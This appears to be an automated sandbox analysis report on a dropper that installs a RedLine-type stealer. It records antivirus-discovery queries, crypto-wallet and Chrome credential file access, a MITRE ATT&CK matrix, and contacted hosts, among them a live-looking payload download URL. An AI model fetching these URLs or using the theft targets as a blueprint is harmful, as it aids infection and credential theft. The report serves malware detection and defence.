Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Source: Amcache.hve.0.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: mopnns.exe, 00000004.00000003.467098330.0000000005A25000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.480988504.0000000005A26000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000003.467174939.0000000005A04000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.480909790.0000000005A05000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 4.2.mopnns.exe.49d0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.mopnns.exe.74ac80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.21c54fe.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.4f40000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.mopnns.exe.74ac80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.49d0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.21c54fe.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.21c63e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.49d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.4f40000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.49d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.21c63e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476408687.0000000004F40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mopnns.exe PID: 6312, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp	String found in binary or memory: rm4C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp	String found in binary or memory: rm-cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp	String found in binary or memory: rm8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: mopnns.exe, 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Source: VYeSXonMT1.exe	Binary or memory string: WIN_XP
Source: VYeSXonMT1.exe, 00000000.00000003.374805242.0000000003A60000.00000004.00000001.sdmp	Binary or memory string: ?A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle1.1.33.02\AutoHotkey.exeWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003WIN_2000%04hX0x%IxpPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCcFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameWpsapi
Source: VYeSXonMT1.exe	Binary or memory string: WIN_VISTA
Source: VYeSXonMT1.exe	Binary or memory string: WIN_7
Source: VYeSXonMT1.exe	Binary or memory string: WIN_8
Source: VYeSXonMT1.exe	Binary or memory string: WIN_8.1

Source: Yara match	File source: 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mopnns.exe PID: 6312, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 4.2.mopnns.exe.49d0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.mopnns.exe.74ac80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.21c54fe.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.4f40000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.mopnns.exe.74ac80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.49d0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.21c54fe.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.21c63e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.49d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.4f40000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.49d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mopnns.exe.21c63e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476408687.0000000004F40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mopnns.exe PID: 6312, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00416D40 Shell_NotifyIconW,DeleteObject,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,_free,_free,_free,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004175E0 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	Path Interception	Exploitation for Privilege Escalation1	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer14	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection2	Deobfuscate/Decode Files or Information1	Input Capture121	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter2	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Security Account Manager	System Information Discovery145	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing23	NTDS	Query Registry1	Distributed Component Object Model	Input Capture121	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Security Software Discovery361	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol14	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion231	Cached Domain Credentials	Virtualization/Sandbox Evasion231	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection2	DCSync	Process Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
VYeSXonMT1.exe	51%	Virustotal		Browse
VYeSXonMT1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\blair\mopnns.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\blair\mopnns.exe	82%	ReversingLabs	Win32.Trojan.Lockbit

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.VYeSXonMT1.exe.3990e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
4.1.mopnns.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.VYeSXonMT1.exe.3a60000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
blairwitch.top	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://service.r	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://tempuri.org/Entity/Id4	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19Response	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://support.a	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6Response	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id20	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22	0%	URL Reputation	safe
http://tempuri.org/Entity/Id23	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Response	0%	URL Reputation	safe
http://forms.rea	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13	0%	URL Reputation	safe
http://blairwitch.top/work/mix.exemopnns.exe?	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id14	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17	0%	URL Reputation	safe
http://blairwitch.top/work/mix.exe	13%	Virustotal		Browse
http://blairwitch.top/work/mix.exe	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id18	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://blairwitch.top/jollion/apines.exet	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
blairwitch.top	8.209.114.247	true	false	2%, Virustotal, Browse	unknown
iplogger.org	5.9.162.45	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://blairwitch.top/work/mix.exe	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
https://iplogger.org/S	VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/chrome_newtab	mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	false		high
http://service.r	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/ac/?q=	mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
https://autohotkey.com	VYeSXonMT1.exe, VYeSXonMT1.exe, 00000000.00000002.406063064.0000000003990000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405371643.0000000000400000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000003.374805242.0000000003A60000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id12Response	mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://iplogger.org/a	VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp	false		high
http://tempuri.org/	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id21Response	mopnns.exe, 00000004.00000002.469190974.00000000025E2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id9	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id8	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id4	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id7	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_real	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id19Response	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_pdf	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id15Response	mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://forms.real.com/real/realone/download.html?type=rpsp_us	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false		high
http://support.a	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id6Response	mopnns.exe, 00000004.00000002.469190974.00000000025E2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
https://api.ip.sb/ip	mopnns.exe, 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.476408687.0000000004F40000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_quicktime	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/sc	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id9Response	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id20	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
